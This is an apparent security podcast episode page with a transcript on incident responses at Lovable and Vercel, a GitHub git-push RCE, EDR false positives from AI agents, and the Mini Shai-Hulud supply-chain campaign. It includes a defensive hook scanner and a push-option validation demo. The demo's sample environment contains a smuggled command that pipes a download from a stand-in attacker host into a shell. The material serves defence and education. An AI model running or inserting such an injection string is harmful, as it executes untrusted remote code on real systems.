The OpenSourceMalware Show #2
Lovable and Vercel security incidents, a crazy git push RCE exploit, EDR vs AI agents, and the Mini-Shai-Hulud attack
By cb482791-4ef1-4762-96ad-b0ca4bdd538e
The OpenSourceMalware Show is available on YouTube, LinkedIn, and as a podcast.
In this episode, we covered:
Lovable and Vercel incident response failures: Two AI-native platforms had significant security incidents in recent weeks, and both initially responded by minimizing the severity. We break down why Lovable’s regression exposed source code and full chat history to any free account holder (the mother of all IDORs), why Vercel’s response left paying customers without a single actionable mitigation step, and what good incident response communication actually looks like.
GitHub RCE via git push: A remote code execution vulnerability that sat in GitHub’s codebase for over a decade allowed arbitrary commands supplied through the -o (push option) flag on a git push to be executed on GitHub’s side. We discuss why this happened, why it is not entirely surprising given Git’s design history, and what it means for the ecosystem.
EDR vs. AI coding agents: Paul’s EDR flagged his own development environment as infected while he was refactoring a library with Claude. We unpack why AI agents operating at non-human speed trigger the same behavioral signatures as ransomware, and why this is going to become a bigger problem as agentic coding workflows become the norm.
Mini Shai-Hulud by Team PCP: Team PCP’s latest campaign compromised the Lightning Python package (15 million downloads per week) and the Intercom npm client (370,000 downloads per week), among others. We cover what makes this campaign notable: Team PCP has adopted the VS Code tasks file persistence technique previously seen only in DPRK-linked campaigns like TasksJacker and Pollen Rider, so that simply opening an affected repository in VS Code re-infects the machine. We also discuss what over 2,000 exfiltration repositories on GitHub mean for affected developers and organizations, and what you should be doing right now if you are worried you are affected.
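The two auto-execution hooks discussed in this episode, a VS Code task that runs on folder open and an npm install-time lifecycle script, are both things you can grep a checkout for. The scanner below is an added example written for this page, not OpenSourceMalware tooling or anything from the campaign itself; the tasks.json and package.json it scans are constructed samples that only mimic the shape described, and the file names and paths in them are hypothetical.

```python
"""Added example (not OpenSourceMalware tooling): scan a checkout for the two
auto-execution hooks the episode describes, VS Code tasks that run on folder
open and npm install-time lifecycle scripts. Sample files below are constructed."""
from __future__ import annotations

import json
import re
import tempfile
from pathlib import Path

# npm runs these during `npm install` with no further user action.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def load_jsonc(text: str) -> dict:
    """VS Code config files are JSONC: strip /* */ blocks, whole-line //
    comments and trailing commas before parsing. (A literal '/*' inside a
    string would confuse the first regex; acceptable for a triage tool.)"""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def folder_open_tasks(tasks_json: str) -> list[dict]:
    """Tasks VS Code starts automatically when the folder is opened
    (runOptions.runOn == "folderOpen"), subject to workspace trust and the
    task.allowAutomaticTasks setting."""
    hits = []
    for task in load_jsonc(tasks_json).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            hits.append({
                "label": task.get("label"),
                "command": task.get("command"),
                "args": task.get("args", []),
            })
    return hits


def install_scripts(package_json: str) -> dict[str, str]:
    """Lifecycle scripts that run during `npm install` of this package."""
    scripts = json.loads(package_json).get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}


def scan_tree(root: str | Path) -> list[dict]:
    """Walk a checkout (node_modules included, since that is where an
    installed malicious package lives) and collect both hook types."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        rel = str(path.relative_to(root))
        if path.name == "tasks.json" and path.parent.name == ".vscode":
            for task in folder_open_tasks(path.read_text()):
                findings.append({"path": rel, "kind": "vscode-folderOpen", **task})
        elif path.name == "package.json":
            try:
                scripts = install_scripts(path.read_text())
            except json.JSONDecodeError:
                continue
            for name, cmd in scripts.items():
                findings.append({"path": rel, "kind": "npm-lifecycle",
                                 "script": name, "command": cmd})
    return findings


# Constructed sample files; the file names inside them are hypothetical.
SAMPLE_TASKS_JSON = """{
  // constructed sample, not a real campaign artifact
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "node",
      "args": [".vscode/setup.js"],
      "runOptions": { "runOn": "folderOpen" },
    },
    { "label": "test", "type": "shell", "command": "npm test" }
  ]
}"""

SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-lib",
    "version": "1.0.0",
    "scripts": {"postinstall": "node setup.js", "test": "jest"},
})


def demo() -> list[dict]:
    """Build a throwaway checkout from the samples and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ".vscode").mkdir()
        (root / ".vscode" / "tasks.json").write_text(SAMPLE_TASKS_JSON)
        (root / "package.json").write_text(SAMPLE_PACKAGE_JSON)
        return sorted(scan_tree(root), key=lambda f: f["path"])


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point it at a real checkout with scan_tree(".") and expect noise: plenty of legitimate packages ship a postinstall, so treat a hit as a triage queue, not a verdict. A folderOpen task in a repository that has no business starting anything on open, or a lifecycle script that launches a second-stage file, is what deserves a closer look.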
Episode Resources
AI Full-Stack Development: The Anti-Patterns Rise Against Us - Part 1
Our research on some security anti-patterns we discovered when auditing how AI tools write code
Mini Shai-Hulud Borrowed Its Best Trick From PolinRider
An analysis of the Team PCP campaign “Mini Shai-Hulud”, including details on the trick they borrowed from North Korean campaigns like PolinRider and Contagious Interview
Renovate & Dependabot: The New Malware Delivery System
A GitGuardian blog about the way these tools can accidentally auto-install malware.
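One more added example before the transcript, tied to the GitHub RCE item in the summary above. Git’s own plumbing for push options is documented in githooks(5): when receive.advertisePushOptions is enabled, each `git push -o` value reaches the pre-receive and post-receive hooks as the environment variables GIT_PUSH_OPTION_COUNT and GIT_PUSH_OPTION_n. The episode does not say which code path at GitHub executed those values, and the hook below is not GitHub’s code; it is a hypothetical server-side hook, with a hypothetical allowlist and deploy script, showing the bug class (an option string handed to a shell) next to the handling a hook should use (options are data, validated against an allowlist and passed as a single argv element). The environment it reads is constructed.

```python
"""Added example, not GitHub's code: how `git push -o` values reach a
server-side hook (documented in githooks(5) as GIT_PUSH_OPTION_COUNT and
GIT_PUSH_OPTION_<n>) and how a hook should treat them. The option names,
allowlist and deploy script are hypothetical."""
from __future__ import annotations

import re

# Hypothetical allowlist: option key -> pattern its value must fully match.
ALLOWED_OPTIONS = {
    "ci.skip": re.compile(r""),                     # flag only, no value
    "deploy.env": re.compile(r"[a-z][a-z0-9-]{0,31}"),
}


def push_options(env: dict[str, str]) -> list[str]:
    """Read push options exactly as a hook sees them in its environment."""
    count = int(env.get("GIT_PUSH_OPTION_COUNT", "0"))
    return [env[f"GIT_PUSH_OPTION_{i}"] for i in range(count)]


def validate(options: list[str]) -> tuple[dict[str, str], list[str]]:
    """Split each option at the first '=' and keep only allowlisted keys
    whose value matches the pattern. Everything else is rejected, and
    nothing is ever interpreted."""
    accepted: dict[str, str] = {}
    rejected: list[str] = []
    for opt in options:
        key, _, value = opt.partition("=")
        pattern = ALLOWED_OPTIONS.get(key)
        if pattern is None or not pattern.fullmatch(value):
            rejected.append(opt)
        else:
            accepted[key] = value
    return accepted, rejected


def unsafe_shell_line(option: str) -> str:
    """The bug class: the raw option is pasted into a shell command line, so
    ';' or '|' in it end the intended command and start another."""
    return f"/opt/hooks/deploy.sh {option}"


def safe_argv(option: str) -> list[str]:
    """Same intent, but the option travels as one argv element; no shell
    parses it, so it can only ever be an argument to deploy.sh."""
    return ["/opt/hooks/deploy.sh", option]


# Constructed environment resembling what a hook receives for
#   git push -o ci.skip -o 'deploy.env=prod; curl attacker.invalid | sh' -o notify=yes
SAMPLE_ENV = {
    "GIT_PUSH_OPTION_COUNT": "3",
    "GIT_PUSH_OPTION_0": "ci.skip",
    "GIT_PUSH_OPTION_1": "deploy.env=prod; curl attacker.invalid | sh",
    "GIT_PUSH_OPTION_2": "notify=yes",
}


def demo() -> dict:
    """Run the sample push through both handling styles."""
    opts = push_options(SAMPLE_ENV)
    accepted, rejected = validate(opts)
    injected = opts[1]
    return {
        "accepted": accepted,
        "rejected": rejected,
        "unsafe_line": unsafe_shell_line(injected),
        "safe_argv": safe_argv(injected),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The allowlist is the part that matters: a hook that only ever compares option strings against known keys and validates their values has no code path in which a push option becomes a command. If a value must reach another program, it goes as its own argv element, never through a shell.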
[00:00:00] Jenn Gile: We’re here on Thursday, April 30th to talk a bit about what’s in the news, what’s been on our minds. Spoiler, we’re gonna be talking about the nasty campaign that’s been going on for the last couple days by Team PCP called Mini Shai-Hulud.
Vercel and Lovable Security Incidents
[00:00:47] Jenn Gile: So let’s start off quickly with a little lightning round of news. In the last couple weeks, there were some major security incidents with Vercel and Lovable. We’re fans of those platforms, we know people at those companies. We’re not here to throw rocks, but at the same time, we don’t necessarily feel like the security announcements went the way that we would wanna see them. Paul, why don’t you start and share your thoughts?
[00:01:00] Paul McCarty: Yeah, I think that while we’re fans of those platforms and we use some of these platforms, one of the things that we saw with both the Lovable and the Vercel announcements was an initial kind of defensive way of responding to it. Like, “no, there’s nothing to see here.”
[00:01:15] Jenn Gile: Nothing to see here. Move on, folks.
[00:01:18] Paul McCarty: And then in both cases -- so the Lovable thing wasn’t technically a breach per se. Basically what they did is they regressed something that had been fixed in early February. Something they’d fixed earlier accidentally got re-regressed. They didn’t catch that. And then it opened up the ability for people with free accounts to be able to see both the source code and the chat history for anybody on the platform. That’s a pretty huge, glaring problem. And Lovable’s combativeness and hubris in their tweets and their responses just did not sit well with me.
[00:02:00] Paul McCarty: And even in the last tweet, which I posted on LinkedIn, they said, “Let’s be clear, this is not a data breach.” Well, you’re being kind of wishy-washy with your words there. This is like the mother of all IDORs, right? Where you can basically see the source code, the core intellectual property, and the chat history where you’re dropping API keys. And then you layer on top of that, what you and I are going to be talking about next week -- where Lovable and many of these AI platforms are encouraging people using them to drop API keys and credentials into the chat.
[00:02:45] Paul McCarty: Now you have a problem where the chats are visible to anybody in the world, and you’ve been dropping all these things in there because even if you tell it not to, it still prompts you to do these things. And for Vercel, the biggest issue I had as a Vercel customer is they did not produce any actionable mitigation steps. None. Zero.
[00:03:00] Paul McCarty: I had to basically write a document, which is on the OpenSourceMalware GitHub repo, which has been very popular. And I had people inside of Vercel reaching out to me saying, “Thank you for creating this. This is good.” And that was really frustrating as a paying Vercel customer -- not to have remediation advice.
[00:03:30] Jenn Gile: Yeah. And that said, we’ve heard that there have been some culture changes since that incident. I’ll go ahead and pop the incident response repo that you made into the chat. Meanwhile, let’s move on to our next topic, because we said lightning.
GitHub RCE Vulnerability
[00:03:50] Jenn Gile: So let’s talk about the GitHub RCE that came out. Was it this week? A lot has happened this week.
[00:04:00] Paul McCarty: Yeah. So basically this is crazy. When I read this, I thought for sure this can’t possibly be true. But basically what happened is that sitting inside of the GitHub codebase for over a decade, you could pass a -o option when you do a git push. So this is first a Git thing that GitHub themselves then interpreted poorly. Git itself is not secure by design -- Linus wrote it and didn’t add authentication. And so the fact that we’re then taking anything you pass with -o into GitHub and then executing it -- it’s remote code execution. You could pass it anything and it would run.
[00:04:45] Paul McCarty: It’s not great.
[00:04:50] Jenn Gile: No. Horrible.
EDR vs. AI Coding Agents
[00:05:00] Jenn Gile: Alright. And then third -- maybe this is the hot take of the week. We’re seeing a trend where EDR is becoming the enemy of coding agents. It’s a little bit wild how we came to this conclusion. It was through a personal experience. I think you and I might have actually been chatting when it happened. You said, “Oh no, just got a pop-up from our EDR -- we won’t say who it is -- that you’ve been compromised.” You looked into it and it turned out, thank goodness, not compromised. False alarm. But this connects to behaviors that EDRs look for that, in the past, would have been legitimate signals that something malicious was happening, but in the age of AI are not a signal. And that was: changes happening not at the speed of human action. Paul, talk for another minute about what happened and why you think EDR is having an issue here.
[00:06:00] Paul McCarty: Yeah, and I wanna expand on this in future episodes. But basically what it comes down to -- you said it pretty succinctly -- I was working with Claude, refactoring a library. I was editing files myself manually in Vim, and Claude was editing some of these files too. This wasn’t malware analysis on my laptop. This was a library we’re writing as part of the OpenSourceMalware platform, and that library has to do with de-obfuscating code -- de-obfuscating, not obfuscating.
[00:06:45] Paul McCarty: What happened is the EDR put together these actions -- the fact that Claude was moving at non-human speed, making all these changes really quickly, renaming files and changing files. Which looks kind of like what happens when ransomware hits.
[00:07:00] Paul McCarty: But there was also this obfuscation factor. When we went and looked at the logs later, it was talking about obfuscated files. We weren’t obfuscating files in that codebase -- we were doing the opposite. But the EDR thought we were. So it throws up this huge screen that says “infected” and quarantines the library I’m working on, which stops my ability to actually do it.
[00:07:30] Paul McCarty: I think this is gonna become a bigger issue. In the same way that Git and GitHub are not cut out for the speed and scale of iterations for git commits, EDR now with agents running on your machine that move at agent speed -- it doesn’t look like a human, and yet they’re built to detect things that are non-human.
[00:08:00] Jenn Gile: Yeah, absolutely. TLDR: EDR needs better context so that typical AI behavior doesn’t result in a false positive. Okay. Let’s talk about the thing that every defender, incident responder, and researcher is dealing with.
Mini Shai-Hulud Campaign by Team PCP
[00:08:15] Jenn Gile: I’m gonna read one of the messages we got today -- and I don’t know if you’ve seen this one, Paul, yet, but it absolutely spoke to me. I’ve had the same thought. One of our friends said, “Pack up 2026, I’m going home.” Truth. So yesterday morning, I wanna say, is when Team PCP launched their latest attack.
[00:08:45] Jenn Gile: Team PCP is a threat actor group. They’re not government affiliated. There are lots of different subgroups in it -- I’d say it’s a loose coalition of people who historically were not very savvy, but starting in March with the Trivy, Checkmarx, and LiteLLM attacks, we’ve seen them mature.
[00:09:00] Jenn Gile: And we just observed another iteration this week with their Mini Shai-Hulud campaign. Their name, not ours. It does have Shai-Hulud hallmarks, but they’re also doing something really interesting where they’re borrowing a technique from the Pollen Rider campaign, which is a North Korean threat actor campaign. We’ve got thousands of compromised repositories at this point. Most recently, the Lightning project was compromised. Paul, what were your thoughts when you first saw it?
[00:10:00] Paul McCarty: This is definitely not a nothing burger. Last time I checked, which was last night, there are -- like you said -- around 1,200 repos on GitHub. One of the Shai-Hulud components of this is that when it compromises a developer or a CI environment -- because it works in both -- it basically does all the info stealing, wraps it up, compresses it, and then creates a net new repository on the compromised user’s GitHub (or organization’s GitHub), and names it “a mini Shai-Hulud has appeared.”
[00:10:45] Jenn Gile: Yes.
[00:10:47] Paul McCarty: Which is why I made that art. Everybody is loving it.
[00:11:00] Jenn Gile: I’ll do a quick screen share because I am delighted. Your AI art skills are unparalleled, but also this one -- here’s our little baby worm with the chicken. It’s pretty cute.
[00:11:10] Paul McCarty: I like it. “Shai-Hulud has appeared.” So basically Team PCP’s background is that they made their mark doing cloud-native info stealing and compromise. Their background is in compromising cloud providers like AWS.
[00:11:45] Paul McCarty: Fast forward to February when they started this new campaign. They’re not DPRK -- nobody thinks they’re the original threat actors. Instead, they are this crew that has pivoted to focusing on GitHub Actions and compromising GitHub Actions in a number of ways. The inside baseball I’m hearing is that we’re gonna see some really big changes coming from GitHub because GitHub Actions is just being stretched and pushed by threat actors like Team PCP so much.
[00:12:15] Paul McCarty: But they compromise you initially in CI, and they also have all these packages they’re pushing out in both npm and PyPI. Lightning is a package used, unfortunately, in a lot of AI tech stacks. It’s downloaded 15 million times a week -- not a year. Very popular. On the same day, the Intercom client npm package, which is downloaded 370,000 times a week, was also compromised.
[00:12:55] Paul McCarty: But what’s unique about this Mini Shai-Hulud campaign is that they’ve taken what OpenSourceMalware has done all this research around -- starting way back at the beginning of 2026 around DPRK, specifically DPRK evolving the Contagious Interview campaigns to now be proactive.
[00:13:20] Paul McCarty: So instead of only waiting to social engineer people, they now proactively attack people, or use existing compromise from people who were earlier compromised in these Contagious Interview fake-recruiter campaigns. They get persistence on developer laptops or in CI, and they do onward stuff -- they add things to repos and whatnot.
[00:13:45] Paul McCarty: But they’re using one technique as the core persistence and infection vector: VS Code tasks files. This was something that only the TasksJacker and Pollen Rider campaigns were doing, evolving out of Contagious Interview -- the same subgroups inside of the Lazarus Group in North Korea. Now Team PCP, who is not North Korean, is using this technique because it’s such an effective persistence mechanism.
[00:14:10] Paul McCarty: Whoever at Microsoft thought it was a good idea to create a file that adds persistence every single time code is opened in a folder -- because that’s what they’re doing: using a parameter inside of the VS Code tasks file to say “anytime you open something inside this folder.” So anytime you open any piece of source code in VS Code from that affected repository, it then compromises you.
[00:14:45] Paul McCarty: That’s why you now see so many threat actor groups moving to this singular threat vector.
[00:14:55] Jenn Gile: Yeah. And last week we talked about lifecycle scripts in npm. This is, for all intents and purposes, the exact same playbook -- different ecosystem, but you download the file, you don’t have to install it. These lifecycle scripts run automatically, and voila, they own your machine.
Lightning Package Compromise
[00:15:10] Jenn Gile: I am screen sharing right now, so anyone listening on the podcast will have to pop over into YouTube or LinkedIn to see the visual. But this is a threat graph visualization of the Lightning compromise. What we have here is the Lightning package and several indicators of compromise associated with it -- this is the infrastructure used to deliver this malware. We have three URLs, we have hashes, we have IP addresses. One of these is connected to maybe 10 or 11 other packages, other plugins. You can see with these types of campaigns, the breadth and impact of them when they’re using infrastructure for multiple things.
[00:16:00] Paul McCarty: Yeah, 100%. And as you can see there, they’re affecting both PyPI packages and npm, which we mentioned earlier. We’re seeing this across the threat landscape right now where bad guys, because they have access to agents like Claude and Codex, can take existing payloads that work in JavaScript and make them work in Python or Rust.
[00:16:20] Paul McCarty: For example, we’re seeing a lot of campaigns right now where bad guys are publishing Rust libraries, especially targeting the crypto ecosystem, but also using npm or Python libraries to attack on different flanks.
[00:16:50] Paul McCarty: In this case, most of these npm packages -- and Python packages in their own way -- have a lifecycle script added that runs a setup.js file automatically after you install the npm package. That sets up a custom Bun environment, and then it runs a second file -- in the latest iteration, something like router-setup.js. That file is the payload: over 11 megabytes, compressed and obfuscated JavaScript.
[00:17:20] Paul McCarty: That payload is pretty gnarly. It’s an infostealer, but it also adds persistence across all your git repos and finds all the places to put things in for Cursor and VS Code. From that point on, once that runs, they have persistence on your machine. This is how Team PCP and DPRK separately can maintain persistence on developer machines.
[00:17:55] Paul McCarty: And we need to be talking about this more because -- Jenn, you haven’t heard this yet -- I just got hit up by another researcher.
[00:17:58] Jenn Gile: Oh no.
[00:18:00] Paul McCarty: He’s telling me he’s found an iteration on Pollen Rider -- I have not verified this yet -- but he’s saying he’s found an iteration that is hundreds of thousands of affected users rather than the around 2,500 that we have right now inside our database. So I need to go look into that.
[00:18:20] Paul McCarty: But this is a huge issue because they are maintaining persistence on these developer machines and then doing bad stuff and stealing credentials. This is how this keeps growing and growing and growing.
[00:18:40] Jenn Gile: Yeah. The repositories affected by Mini Shai-Hulud are in the over 2,000 range at this point. Let me sort by -- most forks is probably a better way to look at it.
[00:19:00] Paul McCarty: And you’re gonna have security researchers also playing with this too. There’s all this gray area that happens after these where some subset of those git repos are gonna be either legitimate researchers trying to figure out how it works -- but also wannabe bad guys taking the functionality and trying to create their own version of it.
[00:19:25] Paul McCarty: But yeah, around 2,000 or more than 2,000. And basically what those repos are -- somebody was compromised, all their stolen data was wrapped up, compressed, encrypted, and stored inside a net new GitHub repo. So people need to be looking for these GitHub repos inside their personal GitHub environment and their GitHub organizations.
Defensive Actions and Mitigations
[00:20:00] Jenn Gile: Yeah, let’s talk actions. Because undoubtedly there are a lot of people affected by this. And if we can learn anything from what we saw last year with the original Shai-Hulud campaign, waves one and two, it’s that credentials leaked in these repositories -- similar pattern again, lots of files pushed public -- were not getting rotated quickly enough, or at all perhaps.
[00:20:25] Jenn Gile: I’m not sure as an industry that we’ve learned from that. A lot of security professionals will say they don’t necessarily have good insight into where credentials are living in their organization. If that’s a problem for your organization, that’s something I would personally prioritize.
[00:20:45] Jenn Gile: These are not just targeting tech companies. The data we saw last year shows only a little over half of the Shai-Hulud 2.0 wave victims were tech companies. And it’s not only targeting large organizations -- lots of small companies are going to be hit by this.
[00:21:10] Jenn Gile: Some things you can be doing: I was actually chatting with the GitGuardian folks yesterday, and they shared a blog showing research they did around using tools like Dependabot and Renovatebot to auto-upgrade. They found that those tools -- or rather the configuration of those tools -- were directly responsible for auto-upgrading to malicious versions.
[00:21:40] Jenn Gile: So look at your auto-upgrade policies. Pin your dependencies. Enforce cool-down periods. I know this is not the most exciting stuff, but it works. It will go a long way toward making sure you’re not the next victim -- that your repositories don’t go public -- and then figure out how to get a better handle on your secrets location and sprawl so you can quickly rotate and kill them off in these circumstances.
[00:22:05] Jenn Gile: Being able to respond quickly is key. What else would you add, Paul?
[00:22:10] Paul McCarty: Yeah. A lot of the focus in the industry historically has been on keeping that stuff out of CI. And yes, you wanna run credential scanners locally too. But I want to be very clear: bad guys now -- both Team PCP, DPRK, and others -- are targeting the tools on your developer’s laptop, and there are enormous amounts of credentials there.
[00:22:45] Paul McCarty: In this particular case, these packages -- both Python and JavaScript -- are finding Cursor and Claude and other tools specifically on development laptops, compromising those, and stealing data out of them. And the reality is that most people don’t harden their Claude setup.
[00:23:10] Paul McCarty: For example, Trail of Bits -- Dan Guido and his team -- have created a really great resource on GitHub and the Trail of Bits GitHub organization: how to harden your Claude, basically creating CLAUDE.md files and other files to protect credentials and do other kinds of hardening.
[00:23:35] Paul McCarty: How many people have done that? Probably very, very few. And because of that, bad guys compromise these machines -- whether it’s a Python package, npm package, AI skills, GitHub repos, whatever -- and they’re immediately going to those places.
[00:23:55] Paul McCarty: People should be reading this and hardening their agents, but also spending time to think, “Hmm, what have I given my agents in the past?” Like, Lovable keeps prompting people to hand over their secret keys. One: they need to stop doing that. But also: you need to think about how many times you’ve given Lovable or Claude your secret keys. Those conversations are specifically being targeted by these bad guys to be exfiltrated and then used.
[00:24:25] Jenn Gile: Well, I’m gonna end us on perhaps not a high note, but at least it made me smile a little bit. Over on LinkedIn: “Hey Tom… when is it gonna stop, Paul? I’m tired of this. Paul, when is it gonna stop?”
[00:24:40] Paul McCarty: I wrote back: “I know, right?” This week has been crazy. This month has been crazy. I don’t know.
[00:24:50] Jenn Gile: Yeah.
[00:24:52] Paul McCarty: I don’t know when it stops. It doesn’t. It’s getting worse.
[00:24:58] Jenn Gile: It doesn’t. Well, hopefully we have better news to share next time, but we are at our time. Hit us up on LinkedIn, YouTube, wherever you can find us and tell us what you wanna learn about on these. We’ll continue to talk about current events and trends. And when things are not on fire like they were this week -- Freudian slip -- we will talk about more generic things you can be doing, things you need to understand.
[00:25:20] Jenn Gile: I really want to talk about interpretive language malware and how it’s different than compiled malware.
[00:25:25] Paul McCarty: Me too. That’s on my personal list to get to.
[00:25:28] Jenn Gile: Yeah. So what do you want to hear about? See ya.
[00:25:32] Paul McCarty: See everybody. Take care.